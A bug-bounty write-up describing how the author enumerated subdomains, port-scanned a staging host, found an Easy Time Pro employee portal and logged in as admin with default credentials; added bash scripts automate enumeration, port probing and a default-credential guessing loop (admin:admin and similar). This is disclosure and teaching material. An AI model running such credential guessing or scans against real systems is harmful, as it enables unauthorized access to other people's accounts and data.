Easy Admin Access — RVDP
2023-11-16 15:07:24 Author: infosecwriteups.com

Initial Reconnaissance

Initially, I examined the company's main website, going through every page and link to look for obvious security flaws. After going over the primary domain I found nothing worthwhile; the company seemed to have taken significant measures to protect it. So I decided to expand the scope: using my bash one-liner, I enumerated subdomains passively. That turned up a bunch of subdomains, and probing them with httpx showed that 11 of them were live.
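The enumeration step described above in working form, as an added example rather than the author's own one-liner. It normalizes a passively collected list (lowercasing, stripping wildcard prefixes and trailing dots, dropping look-alike names outside the root domain, deduplicating) before handing it to httpx, so the live-host probe is not skewed by duplicates or out-of-scope names. The root domain redacted.com, the sample hostnames and the presence of projectdiscovery's httpx are assumptions.

```shell
#!/usr/bin/env bash
# Added example, not the author's one-liner: normalize a passively collected
# list of subdomains and probe the survivors for live HTTP services.
# Assumptions: redacted.com stands in for the real root domain, the input
# names below are constructed, and httpx (projectdiscovery) is optional.

ROOT_DOMAIN="${ROOT_DOMAIN:-redacted.com}"

# normalize_subdomains: stdin is one hostname per line from any passive source
# (crt.sh, subfinder, amass, ...). Lowercases, trims whitespace, strips
# wildcard "*." prefixes and trailing dots, keeps only names under the root
# domain (so look-alikes such as redacted.com.evil.example are dropped) and
# dedupes, so httpx does not hit the same host twice.
normalize_subdomains() {
    esc=$(printf '%s' "$ROOT_DOMAIN" | sed 's/\./\\./g')
    tr '[:upper:]' '[:lower:]' \
    | sed -e 's/^[[:space:]]*//' -e 's/[[:space:]]*$//' -e 's/^\*\.//' -e 's/\.$//' \
    | grep -E "^([a-z0-9-]+\.)+${esc}"'$' \
    | sort -u
}

# probe_live: pipe the clean list through httpx. -silent prints only hosts that
# answered; -status-code and -title show what each one is. Falls back to just
# echoing the list when httpx is not installed.
probe_live() {
    if command -v httpx >/dev/null 2>&1; then
        httpx -silent -status-code -title
    else
        echo "httpx not installed; printing candidates only" >&2
        cat
    fi
}

# Constructed sample of what passive sources typically return (not real data).
passive_sample() {
cat <<'EOF'
www.redacted.com
STAGING.redacted.com
*.dev.redacted.com
staging.redacted.com.
  api.redacted.com
redacted.com.evil.example
mail.redacted.com
EOF
}

# Only send traffic when explicitly asked; otherwise just show the clean list.
if [ "${PROBE:-0}" = 1 ]; then
    passive_sample | normalize_subdomains | probe_live
else
    passive_sample | normalize_subdomains
fi
```

Run it as `PROBE=1 ./enum.sh` to actually probe. One caveat: on some distributions the `httpx` on PATH is the Python HTTP client's CLI, not projectdiscovery's scanner, and it will reject these flags; check `httpx -version` first.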

Active Subdomains

I checked a few subdomains from the top of the list and then moved on to the staging.redacted.com subdomain.

Hacking The Subdomain

When I first tried to access the subdomain, it threw a pop-up asking for a username and password.

Authentication Pop up

Next, I tried accessing it by IP, but that didn't work either: it returned a Not Found error.

Not Found

So I then looked for open ports on this IP with Nmap. There were a few open ports, and one of them caught my attention. Accessing the IP on that port over plain HTTP landed on an employee management portal.
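The port-scan step above as an added example (not the author's commands): parse nmap's grepable output into the open TCP ports, build a candidate URL for each, and optionally fetch each one to see what answers. Because the bare IP on the default web port returned Not Found while another port served the portal, every open port gets a request rather than only those nmap labels as http. The host 203.0.113.10 is a documentation placeholder and the scan output is constructed.

```shell
#!/usr/bin/env bash
# Added example, not the author's commands: turn an nmap grepable scan of the
# host into candidate web URLs for each open TCP port, then (optionally) fetch
# each one to see what answers. Assumptions: the host IP 203.0.113.10 is a
# documentation placeholder and the scan output below is constructed.

# open_tcp_ports: stdin is nmap -oG output; prints "port service" per open TCP
# port. A -oG Ports entry looks like "80/open/tcp//http///"; field 5 is the
# service name, which without -sV is only nmap's guess from the port number.
open_tcp_ports() {
    grep -oE '[0-9]{1,5}/open/tcp/[^,[:space:]]*' \
    | awk -F/ '{ print $1, ($5 == "" ? "unknown" : $5) }'
}

# url_for_port HOST PORT SERVICE: assume TLS for https-looking services or the
# usual TLS ports, plain HTTP otherwise. Every open port gets a URL because a
# portal can sit on a port nmap labels as something else entirely.
url_for_port() {
    case "$3:$2" in
        https*:*|*:443|*:8443) printf 'https://%s:%s\n' "$1" "$2" ;;
        *)                     printf 'http://%s:%s\n' "$1" "$2" ;;
    esac
}

# probe_url URL: print "status url title" for one request; skipped without curl.
# -k accepts self-signed staging certificates; --max-time keeps dead ports short.
probe_url() {
    command -v curl >/dev/null 2>&1 || { echo "curl not installed" >&2; return 0; }
    out=$(curl -sk --max-time 5 -w '\n%{http_code}' "$1")
    code=$(printf '%s\n' "$out" | tail -n 1)
    title=$(printf '%s\n' "$out" | grep -o '<[tT][iI][tT][lL][eE]>[^<]*' | head -n 1 | cut -c8-)
    printf '%s %s %s\n' "$code" "$1" "${title:-(no title)}"
}

# Constructed nmap -oG output for the target (not real scan data).
nmap_sample() {
cat <<'EOF'
# Nmap 7.94 scan initiated as: nmap -p- -oG - 203.0.113.10
Host: 203.0.113.10 ()	Status: Up
Host: 203.0.113.10 ()	Ports: 22/open/tcp//ssh///, 80/open/tcp//http///, 443/open/tcp//https///, 8080/open/tcp//http-proxy///, 8443/open/tcp//https-alt///	Ignored State: closed (65530)
EOF
}

TARGET_HOST="${TARGET_HOST:-203.0.113.10}"
# Print the candidate URLs; send requests only when PROBE=1 is set.
nmap_sample | open_tcp_ports | while read -r port svc; do
    url=$(url_for_port "$TARGET_HOST" "$port" "$svc")
    if [ "${PROBE:-0}" = 1 ]; then probe_url "$url"; else echo "$url"; fi
done
```

Against a real host, replace `nmap_sample` with `nmap -p- -oG - "$TARGET_HOST"` and run with `PROBE=1`. The status and title per URL are usually enough to spot a management portal among the open ports; a 404 on the bare IP, as seen above, only means that server did not recognise the Host header, not that nothing is listening elsewhere.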

Portal

This turned out to be a third-party service the target was using: a quick search showed that Easy Time Pro is used for attendance and inventory management. As seen in the screenshot, there are two separate sign-ins, one for admins and one for employees.

I tried default credentials on the admin sign-in and simply got admin access 🐧!
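A careful version of the default-credential check, as an added example that is not the author's procedure. The page does not show the portal's login form fields, so this targets an endpoint behind HTTP Basic authentication, the kind of browser pop-up seen on the staging host earlier; for a form login the request would need the form's own field names. It first confirms the endpoint really challenges with 401, then walks a short list and stops at the first pair that is accepted, pausing between attempts. The URL, the credential pairs (generic placeholders, not any product's documented defaults) and the delay are assumptions.

```shell
#!/usr/bin/env bash
# Added example, not the author's commands: test a short list of default
# credentials against an endpoint protected by HTTP Basic authentication.
# Assumptions: the URL is a placeholder, the credential pairs are generic
# examples rather than any product's documented defaults, and the host is in
# scope for testing.

TARGET_URL="${TARGET_URL:-https://staging.redacted.com/}"
DELAY="${DELAY:-1}"   # seconds between attempts; do not hammer the host

# unauth_status URL: status code of a request with no credentials at all.
unauth_status() {
    curl -sk --max-time 10 -o /dev/null -w '%{http_code}' "$1"
}

# http_status URL USER PASS: one Basic-auth request, prints the HTTP status code.
# -k accepts staging certificates; --max-time keeps a dead host from hanging us.
http_status() {
    curl -sk --max-time 10 -o /dev/null -w '%{http_code}' -u "$2:$3" "$1"
}

# try_default_creds URL: confirm the endpoint challenges for Basic auth, then
# walk the pairs below and stop at the first one that is accepted. 401 means
# rejected; 2xx/3xx means accepted; anything else (403, 5xx, 000 for a failed
# connection) is reported but not counted as a hit.
try_default_creds() {
    url=$1
    base=$(unauth_status "$url")
    if [ "$base" != 401 ]; then
        echo "warning: unauthenticated request returned $base, not 401; a 200 below may mean nothing" >&2
    fi
    while IFS=: read -r user pass; do
        [ -n "$user" ] || continue
        code=$(http_status "$url" "$user" "$pass")
        case "$code" in
            2??|3??) printf 'VALID %s:%s -> %s\n' "$user" "$pass" "$code"; return 0 ;;
            401)     ;;
            *)       printf 'unexpected status %s for %s:%s\n' "$code" "$user" "$pass" >&2 ;;
        esac
        sleep "$DELAY"
    done <<'EOF'
admin:admin
admin:password
administrator:administrator
root:root
EOF
    echo "no default pair accepted" >&2
    return 1
}

# Only send requests when explicitly asked, so the file is safe to source.
if [ "${PROBE:-0}" = 1 ]; then
    try_default_creds "$TARGET_URL"
fi
```

The baseline check matters: curl sends Basic credentials pre-emptively, so a page that is not protected at all would return 200 for every pair and look like a hit. Keep the list short and the delay in place; a vendor's published defaults are the first thing to try, and a few attempts are enough to settle the question without tripping lockouts.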

Admin access to the portal

Source: https://infosecwriteups.com/easy-admin-access-rvdp-d1eb2c97cb3e?source=rss----7b722bfd1b8d--bug_bounty